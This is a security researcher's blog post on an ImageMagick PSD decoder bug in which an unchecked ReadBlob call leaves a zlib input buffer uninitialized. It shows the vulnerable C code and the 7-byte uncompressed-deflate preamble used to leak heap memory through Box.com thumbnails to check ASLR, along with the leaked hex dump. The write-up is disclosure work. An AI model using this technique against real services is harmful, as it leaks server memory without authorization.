[0day] Proving Box.com fixed ASLR via ImageMagick uninitialized zlib stream buffer

Overview

In my previous post, we explored using an ImageMagick 0day (now a 1day) in the RLE decoder to to determine missing ASLR in both box.com and dropbox.com. In response, both Box and DropBox sensibly limited the available decoders. Both dropped RLE support and lots more.

As you may recall from a different but related post, I had challenges working with Box to accurately determine the status of security reports I submitted. In fact, I have neither a confirmation nor denial of the missing ASLR issue on ImageMagick. I've already proven the missing ASLR to my satisfaction in the previous posts -- but is it fixed?

This is a fairly ridiculous length to go to, but: let's prove that Box did fix the ASLR issue, by using another ImageMagick 0day!

Visualization

Here's a zoomed in sample image from box.com, in response to thumbnailing a greyscale 8x16 variant of an image file that we'll explore below. We're seeing raw memory bytes from a free chunk:


The vulnerability

So when Box went on an ImageMagick decoder removal spree, they obviously had to leave intact the decoders for a few popular formats: JPEG, PNG, etc. One less common decoders left intact was PSD: Adobe Photoshop. This is an understandable product decision. But it's also more attack surface for us to examine. The 0day vulnerability is in the PSD decoder (coders/psd.c):

ReadPSDChannelZip()
[...]
  compact_pixels=(unsigned char *) AcquireQuantumMemory(compact_size,
    sizeof(*compact_pixels));
[...]
  ResetMagickMemory(&stream,0,sizeof(stream));
  stream.data_type=Z_BINARY;
  (void) ReadBlob(image,compact_size,compact_pixels);

  stream.next_in=(Bytef *)compact_pixels;
  stream.avail_in=(uInt) compact_size;
  stream.next_out=(Bytef *)pixels;
  stream.avail_out=(uInt) count;

  if (inflateInit(&stream) == Z_OK)
    {
      int
        ret;

      while (stream.avail_out > 0)
      {
        ret=inflate(&stream,Z_SYNC_FLUSH);
        if ((ret != Z_OK) && (ret != Z_STREAM_END))
          {
[...]

The above code snippet is reading in a PSD image color channel from the input file, where it is compressed using ZIP compression. The compact_size variable comes nearly directly from the input file, and it represents the size in bytes of the compressed zip stream. This size is used to allocate a malloc()'ed buffer to hold the compressed data, and the buffer is filled with a read from the input stream. The vulnerability is that there is no return value checking for the ReadBlob() call. This means that if the input file hits an end-of-file condition during the read, the compact_pixels buffer will remain partially or even fully uninitialized.

You can refer to this vulnerability as CESA-2017-0003. It really is an 0day: unreported or unfixed upstream, let alone in Linux distributions or on cloud providers.

The exploit

The previous ImageMagick bugs I've been exploiting have been relatively simple to exploit because raw bytes of memory end up directly in the decoded canvas. With this vulnerability, however, the raw bytes of memory are in a buffer which is to be decoded as a zlib stream. Obviously, many possible sequences of bytes will not be valid zlib streams. And sequences of bytes that are valid zlib streams will likely result in output that is hard (or impossible) to reverse back to the original raw memory bytes. Finally, note that zlib streams are checksummed, and quasi-random bytes in memory are unlikely to have a correct trailing checksum.

Fortunately, a little trick does present us a neat solution. It's useful to have a basic understanding of the zlib format, RFC1950 and the contained deflate stream format, RFC1951. The core of the trick is noting the the deflate stream format is composed blocks, with the block types being:

BTYPE specifies how the data are compressed, as follows:

            00 - no compression
            01 - compressed with fixed Huffman codes
            10 - compressed with dynamic Huffman codes
            11 - reserved (error)

We really don't want to get into reversing the output of Huffman decoding, but "no compression" sounds very intriguing. What if we used a preamble of a zlib header followed by an uncompressed deflate block -- leading in to the bytes of uninitialized memory? We can achieve this by abruptly ending our PSD input file with the this 7 byte sequence:

78 9c: standard zlib header and options
01   : deflate block type 1: no compression
ff ff: length 65535
00 00: length "checksum", which is the negation of the length

Let's say we have an input file which claims a compressed length of 16. The 16 byte compressed data buffer is allocated but filling it results in a short read of 7 bytes (which goes unnoticed and unchecked) with the remaining 9 bytes remaining uninitialized:

compact_pixels: | 78 9c 01 ff ff 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? |

Treating this as the first 16 bytes of a zlib stream will decode to whatever is in those 9 bytes of uninitialized memory, as highlighted in red. We're back to exfiltrating raw bytes again, which is a win. (Note that the start of the output is at byte 7 into the heap chunk, which is not nicely 8 bytes aligned. This explains why the pointers in the dump below appear to be offset by 1 byte.)

There's one more quirk, though. This still isn't a valid zlib stream because it is truncated, both in terms of missing data and a missing final checksum. How will the ImageMagick PSD decoder handle this? The answer lies in looking at the exit condition for the zlib deflate loop. We see that it only cares that the output buffer was filled. It specifically does not care if the zlib API never declares that the decode ended. So again taking the hypothetical 16 byte compressed data buffer, the PSD code will stuff 16 bytes as input into the zlib input buffer. Let's further assume that the output channel is a 2x2 canvas, requiring 4 bytes to fill. This buffer and length is also passed to zlib as the ouput buffer and length. When zlib is called for the first time, it will have 9 bytes of actual output available, but emit only 4 of them because that's the size of the output buffer. And that's it. The PSD code will exit the the zlib decode loop and continue. (In case you are curious, a more typical zlib loop would consume the full zlib output buffer, then call into zlib again with a new output buffer to fill. It would also perhaps similarly check to see if the input buffer was fully drained.)

Here's the sample PSD exploit file: zip_uninit_read_128.psd.

I won't break this one down byte by byte because it's 133 bytes of file format glue to get to the ZIP attack surface.

Results

Let's upload the PSD file to Box and then view the preview pane for the uploaded file and save the displayed PNG file. It results in an image like the one above. Extracting raw bytes is just a matter of an ImageMagick conversion command, although the Ubuntu 16.04 LTS ImageMagick appears to be buggy for certain greyscale images, so we'll use GraphicsMagick:

gm convert box_zip_uninit_128.png out.gray
od -t x1 out.gray

0000000 00 f8 81 bd 7b 18 7f 00 00 70 00 00 00 00 00 00
0000020 00 71 00 00 00 00 00 00 00 00 d1 d0 7d 18 7f 00 
0000040 00 78 81 bd 7b 18 7f 00 00 80 94 d0 7d 18 7f 00 
0000060 00 d0 ce d0 7d 18 7f 00 00 20 00 00 00 00 00 00
0000100 00 50 00 00 00 00 00 00 00 80 d1 d0 7d 18 7f 00 
0000120 00 31 00 00 00 00 00 00 00 78 81 bd 7b 18 7f 00 
0000140 00 80 cf d0 7d 18 7f 00 00 30 58 d1 7d 18 7f 00 
0000160 00 78 81 bd 7b 18 7f 00 00 90 00 00 00 00 00 00

In the above hex dump, all of the pointers are highlighted in green. All ten pointers are wholesome pointers indicating good ASLR, hence the green color. You can contrast this with some pointers in my previous post which clearly indicated that Box did not have ASLR on their binary.

Proving a result with a negative (the lack of a clearly dubious pointer) is not particularly scientific, but I'll note that I tried a variety of different upload image sizes in order to explore the content of recently freed heap chunks of a variety of different sizes. I also tried the upload of some files multiple different times and never saw a pointer indicating a lack of binary ASLR. When binary ASLR was indeed absent, the same tests readily indicated the fact.

Conclusion

The overall weight of evidence, split across two blog posts, suggests that Box did not previously have binary ASLR enabled, and they did indeed make a change and fix the issue after my report. We used an ImageMagick 0day (now 1day) to prove that ASLR was missing, and then a different ImageMagick 0day (still 0day today :) to prove that ASLR is now present. The loop is now satisfactorily closed.